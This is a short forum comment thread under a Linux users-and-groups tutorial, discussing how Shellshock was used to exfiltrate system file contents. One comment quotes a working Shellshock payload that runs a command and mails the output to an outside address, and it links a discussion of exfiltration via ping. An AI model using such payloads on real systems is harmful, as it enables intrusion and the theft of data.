You are viewing a single comment's thread from:

RE: Linux Tutorial - Understanding User and Group

in #utopian-io7 years ago

Yeah I saw some people mail themselves the content of these two files with either mail like this:

() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' [email protected] obviously the command had to be adapted a bit and you had to have a few things setup in a certain way for this to work. I also saw some more creative data exfiltration methods mentioned here: ~~~ embed:AskNetsec/comments/39a8my/how_to_exploit_shellshock_with_only_ping/ such as using ping :) reddit metadata:fEFza05ldHNlY3xodHRwczovL3d3dy5yZWRkaXQuY29tL3IvQXNrTmV0c2VjL2NvbW1lbnRzLzM5YThteS9ob3dfdG9fZXhwbG9pdF9zaGVsbHNob2NrX3dpdGhfb25seV9waW5nLyBzdWNoIGFzIHVzaW5nIHBpbmcgOil8 ~~~
Thanks for interesting post. Will be following you. I'm gonna post this on reddit.com/r/linux_mentor. https://blog.cloudflare.com/inside-shellshock/

Sort:  

There is always a way for those who are persistent in finding ways to penetrate a system. The shellshock case also shows how vulnerabilities can be exploited for negative things. Thanks for sharing full of information's link about Pentesting. Two thumbs up for you.